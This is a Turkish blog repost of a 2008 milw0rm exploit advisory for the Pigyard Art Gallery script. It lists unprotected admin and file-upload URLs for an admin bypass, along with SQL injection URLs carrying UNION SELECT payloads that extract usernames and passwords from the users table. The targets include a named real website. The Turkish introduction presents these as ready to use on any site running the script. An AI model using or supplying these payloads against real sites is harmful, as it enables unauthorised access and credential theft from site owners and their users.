Bu açık sayesinde scriptin mevcut olduğu sitelerde dosya upload, sql injection ve admin bypass yapmamız mümkün.
Pigyard Art Gallery Multiple Remote Vulnerabilities
admin bypass
Pictures Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_pictures
example web sites:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures
Availibility Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_availibilities
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities
Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_exhibitions
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions
Genres Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_genres
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genresMedia
Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_media
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media
Artist Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_artists
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists
Empty Artists and Exhibitions Edit & Add:
http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates
example:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates
file upload:
http://localhost/php/templates/file_uploader/file_selector.php
example:
http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php
sql injection:
SQL inj.exploit 1:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=
[SQL]exploit 2:
http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=
[SQL]exploit 3
http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=
[SQL]example web site:
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL]
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]
http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]
example [SQL] : -1/**/union/**/select/**/0,1,2,3,4/*
Added a default sql injection string by Aria-Security Team /str0keAria-Security Team, http://Aria-Security.net-------------------------------Shout Outs: AurA, imm02tal, iM4N, Kinglet,Vendor: Pigyard Art Gallery Multiple SQL InjectionThis is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)Original
Link:
http://forum.aria-security.net/showthread.php?p=1474module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*Regards,The-0utl4w
# milw0rm.com [2008-02-24]
7 Eylül 2008 Pazar
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder